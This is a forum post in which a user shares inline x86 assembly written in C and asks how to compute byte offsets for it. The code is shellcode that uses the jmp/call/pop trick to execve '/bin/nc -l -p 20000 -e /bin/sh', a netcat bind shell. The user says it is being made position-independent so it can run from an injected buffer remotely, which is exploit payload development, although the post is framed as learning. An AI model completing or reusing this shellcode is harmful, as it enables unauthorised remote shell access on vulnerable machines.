Thread: Assembly in C?

Closer. I've eliminated a little dependence. I'm not sure how to populate an actual array however at runtime

Code:

void main()
{
 __asm__(
"jmp call1\n\t"
"start1:\n\t"
"pop %esi\n\t"
"lea (%esi),%ecx\n\t"
"jmp call2\n\t"
"start2:\n\t"
"pop %esi\n\t"
"mov %esi,%ebx\n\t"
"mov $0x0,%edx\n\t"
"mov $0xb,%eax\n\t"
"int $0x80\n\t"
"call1:\n\t"
"call start1\n\t"
"myarr: .long arg1,arg2,arg3,arg4,0\n\t"
"call2:\n\t"
"call start2\n\t"
"arg1: .string \"/bin/nc\"\n\t"
"arg2: .string \"-l\"\n\t"
"arg3: .string \"-p 20000\"\n\t"
"arg4: .string \"-e /bin/sh\""
);

So you mean instead of:

Code:

"myarr: .long arg1,arg2,arg3,arg4,0\n\t"

do:

Code:

"myarr: .long myarr+?,myarr+?,myarr+?,myarr+?,0\n\t"

So then it's:

Code:

"myarr: .long myarr-?,myarr-?,myarr-?,myarr-?,0\n\t"

How do I know what to put in for the question marks? My guess would be that since my code looks like this:

Code:

"myarr: .long arg1,arg2,arg3,arg4,0\n\t"
"call2:\n\t"
"call start2\n\t"
"arg1: .string \"/bin/nc\"\n\t"
"arg2: .string \"-l\"\n\t"
"arg3: .string \"-p 20000\"\n\t"
"arg4: .string \"-e /bin/sh\""

I think the first ? is 5 bytes because I think call is a 5 byte instruction. And then I think the second one is /+b+i+n+/+n+c = 7 + 5 = 12 bytes and so on. Is that correct?

Now, when I'm running the code locally, the arguments will be at lower memory values than myarr, so I would want to subtract. But when I put the code in a buffer wouldn't the arguments be higher in memory than myarr. So I think I'd have to do subtraction to get them to work here and addition to get them to work remotely. Is that correct?

Thanks for all the help guys. I'll mull a bunch of these ideas around in my head.

Learning is my main objective here, but I learn best through listening to people who know more, rather than googling although I've done a ton of googling as well